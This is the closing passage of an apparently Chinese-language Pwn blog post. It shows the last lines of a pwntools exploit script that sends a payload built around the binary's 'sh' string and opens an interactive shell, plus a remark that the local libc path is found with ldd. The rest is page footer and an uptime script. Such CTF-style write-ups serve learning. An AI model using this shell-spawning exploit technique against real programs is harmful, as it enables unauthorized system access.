class="number">0xdeadbeef</span>,<span class="built_in">next</span>(elf.search(<span class="string">b&quot;sh\x00&quot;</span>))])</span><br><span class="line">io.sendlineafter(<span class="string">b&quot; :&quot;</span>,payload)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<p>其中libc已经和视频课中给出的不同了，我们要用ldd指令进行查看，查看之后将查看出的路径填入libc</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Pwn/" rel="tag"><i class="fa fa-tag"></i> Pwn</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/06/05/%E5%8D%9A%E5%AE%A2/" rel="prev" title="博客">
                  <i class="fa fa-angle-left"></i> 博客
                </a>
            </div>
            <div class="post-nav-item">
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">zy</span>
  </div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>


<!-- 网站运行时间的设置 -->
<span id="timeDate">载入天数...</span>
<span id="times">载入时分秒...</span>
<script>
    var now = new Date();
    function createtime() {
        var grt= new Date("03/01/2023 10:00:00"); //此处修改你的建站时间或者网站上线时间
        now.setTime(now.getTime()+250);
        days = (now - grt ) / 1000 / 60 / 60 / 24; dnum = Math.floor(days);
        hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum); hnum = Math.floor(hours);
        if(String(hnum).length ==1 ){hnum = "0" + hnum;} minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum);
        mnum = Math.floor(minutes); if(String(mnum).length ==1 ){mnum = "0" + mnum;}
        seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
        snum = Math.round(seconds); if(String(snum).length ==1 ){snum = "0" + snum;}
        document.getElementById("timeDate").innerHTML = "本站已安全运行 "+dnum+" 天 ";
        document.getElementById("times").innerHTML = hnum + " 小时 " + mnum + " 分 " + snum + " 秒.";
    }
setInterval("createtime()",250);
</script>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
